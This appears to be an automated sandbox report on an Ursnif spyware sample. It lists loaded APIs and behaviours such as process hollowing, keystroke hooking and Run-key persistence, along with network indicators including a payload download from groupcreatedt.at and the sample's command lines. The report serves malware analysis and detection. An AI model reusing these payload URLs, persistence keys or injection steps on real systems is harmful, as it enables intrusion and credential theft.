DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: ntdll.dll/RtlExitUserThread
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: Secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: devrtl.DLL/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/GetWindowLongPtrA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/SetWindowLongPtrA
DynamicLoader: USER32.dll/SetClipboardViewer
DynamicLoader: USER32.dll/IsClipboardFormatAvailable
DynamicLoader: USER32.dll/GetClipboardOwner
DynamicLoader: USER32.dll/RegisterDeviceNotificationA
DynamicLoader: USER32.dll/GetMessageA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: WS2_32.dll/
DynamicLoader: ncrypt.dll/SslDecrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
Encrypts a single HTTP packet
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
Reads data out of its own binary image
self_read: process: KmHJvidHgRX.exe, pid: 3064, offset: 0x00000000, length: 0x0004ea00
A process created a hidden window
Process: KmHJvidHgRX.exe -> C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
CAPE extracted potentially suspicious content
KmHJvidHgRX.exe: Injected PE Image: 32-bit executable
corrawex.exe: Injected PE Image: 64-bit executable
corrawex.exe: Injected Shellcode/Data
corrawex.exe: Ursnif Payload: 64-bit DLL
corrawex.exe: [{u'strings': [u'{ 41 8B 02 FF C1 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D9 }', u'{ 44 8B D9 33 C0 45 33 C9 44 33 1D 2D B9 01 00 4C 8B D2 48 85 D2 74 37 4C 8D 42 10 45 3B 0A 73 2E 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12 }'], u'meta': {u'cape_type': u'Ursnif Payload', u'description': u'Ursnif Payload', u'author': u'kevoreilly & enzo'}, u'addresses': {u'decrypt_config64': 125588L, u'crypto64_1': 171678L}, u'name': u'Ursnif'}]
corrawex.exe: Injected PE Image
corrawex.exe: Ursnif Payload: 64-bit DLL
corrawex.exe: [{u'strings': [u'{ 41 8B 02 FF C1 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D9 }', u'{ 44 8B D9 33 C0 45 33 C9 44 33 1D 2D B9 01 00 4C 8B D2 48 85 D2 74 37 4C 8D 42 10 45 3B 0A 73 2E 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12 }'], u'meta': {u'cape_type': u'Ursnif Payload', u'description': u'Ursnif Payload', u'author': u'kevoreilly & enzo'}, u'addresses': {u'decrypt_config64': 123224L, u'crypto64_1': 169314L}, u'name': u'Ursnif'}]
svchost.exe: Injected PE Image: 64-bit executable
svchost.exe: Injected Shellcode/Data
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.php.net/license/3_0.txt
suspicious_request: http://groupcreatedt.at/key/x64.bin
Performs some HTTP requests
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00045a00, virtual_size: 0x00045910
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
Uses Windows utilities for basic functionality
command: C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
Queries information on disks for anti-virtualization via Device Information APIs
Behavioural detection: Injection (Process Hollowing)
Injection: corrawex.exe(2980) -> svchost.exe(1308)
Executed a process and injected code into it, probably while unpacking
Injection: corrawex.exe(2980) -> svchost.exe(1308)
Deletes its original binary from disk
Sniffs keystrokes
SetWindowsHookExA: Process: explorer.exe(1708)
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
A system process is generating network traffic likely as a result of process injection
network_connection: explorer.exe_WSASend_get /license/3_0.txt http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: www.php.net
network_connection: explorer.exe_WSASend_get /key/x64.bin http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: groupcreatedt.at
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00n\x01\x00\x00j\x03\x01^y\xd7rk\xe4yv\xb8{ke\xf1\x90\xb4b\x95.\xb6\xccz\xd1 \xc20\xcc \xfbkal\xda\x00\x00\x18\x00/\x005\x00\x05\x00 \xc0\x13\xc0\x14\xc0 \xc0 \x002\x008\x00\x13\x00\x04\x01\x00\x00)\xff\x01\x00\x01\x00\x00\x00\x00\x10\x00\x0e\x00\x00\x0bwww.php.net\x00 \x00\x06\x00\x04\x00\x17\x00\x18\x00\x0b\x00\x02\x01\x00
network_connection: explorer.exe_WSASend_\x16\x03\x01\x00f\x10\x00\x00ba\x04s\x06l\xf0\x10\x05\xe3\xc6#\xcf \x9eq"2\xea\x95 \xbe\x14)\x0c\x82\x12\xe0~2\x9e\xf63t\xb61y7\xa7 \x0cw\xe2\xf7\xb7t\xc5cba!\x00\xbd\xe0\x0f\x87\x9ah\x83\xf61\xac8\xee\xaf4\x06\x14\x03\x01\x00\x01\x01\x16\x03\x01\x000\xd0\~\xa9\x18l<\xa13^l\xbf\x96\x1f2 1\x837\xfa\xb7\x8e\xc7\x03\xe75\xd1\x181fv\x8ap4\xd9\xea\x1a\x93%8\xe4=\x7fs<\x1au\
network_connection: explorer.exe_WSASend_get /msdownload/update/v3/static/trustedr/en/authrootstl.cab http/1.1 cache-control: max-age = 3600 connection: keep-alive accept: */* if-modified-since: wed, 26 feb 2020 21:39:14 gmt if-none-match: "06d5b30edecd51:0" user-agent: microsoft-cryptoapi/
network_connection: explorer.exe_WSASend_\x17\x03\x01\x00\x90,\x1bl\x92\xf1\x82cjq\xfegj\x1b\xd7\x834\xfb\x11\xd2\xb4~c3e\xcej\x1b&\xc44j\x06@\x1da\x98\xd50\x02\x08\xcbd\x1c:g\x90\x9f1\x8fd\x98\xcd\x81\x03\xa7\x0f\x92\x10\x9e\xc5\x17i\xd5\xf0\xd4y\xec\xa8qp}2\xa8\xea\xcf\x1b\xdc\xb4\x14\xa6\xe2\x8c\xb0\xbal\x84\x9c\xd1\xfb \xe4\x19n\x1e \xfc\x05\xa4d\xbco\xf1en\xa7\xb7\xb3\x00\xb4\x00]\xb7\x101\x11\xce\xa3\xa6\x1d\xe5!\xc6\xe8\xd6\xa2<\xa4qooi0\xb2\x85\xeb \xad\xf1y\x16\x9a\xccq\xad
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Exhibits behavior characteristics of Ursnif spyware
CAPE detected the Ursnif malware family
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Creates a slightly modified copy of itself
file: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
percent_match: 99

Hosts

Direct  IP               Country Name
Y       8.8.8.8          United States
N       23.202.161.73    United States
N       192.42.116.41    Netherlands
N       192.229.232.240  United States
N       185.85.0.29      Germany

DNS

Name  Response  Post-Analysis Lookup
www.php.net
    A      185.85.0.29
    CNAME  www-php-net.ax4z.com
www.download.windowsupdate.com
    CNAME  cs12.wpc.v0cdn.net
    A      192.229.232.240
    CNAME  2-01-3cf7-0009.cdx.cedexis.net
    CNAME  wu.ec.azureedge.net
    CNAME  wu.wpc.apr-52dd2.edgecastdns.net
    CNAME  wu.azureedge.net
www.microsoft.com
    CNAME  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    CNAME  e13678.dspb.akamaiedge.net
    CNAME  www.microsoft.com-c-3.edgekey.net
    A      23.202.161.73
groupcreatedt.at
    A      192.42.116.41

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Windows\sysnative\*.dll
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\F9FA
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.tmp
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat"
C:\Users\user\AppData\Local\Temp\cmd.*
C:\Users\user\AppData\Local\Temp\cmd
C:\Windows\System32\cmd.*
C:\Windows\System32\cmd.COM
C:\Windows\System32\cmd.exe
C:\
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming
C:\Windows\sysnative\p2pcollab.dll
C:\Windows\sysnative\QAGENTRT.DLL
C:\Windows\sysnative\dnsapi.dll
C:\Windows\sysnative\fveui.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Windows\sysnative\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Windows\sysnative\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Windows\sysnative\CabA509.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
C:\Windows\sysnative\CabA77B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
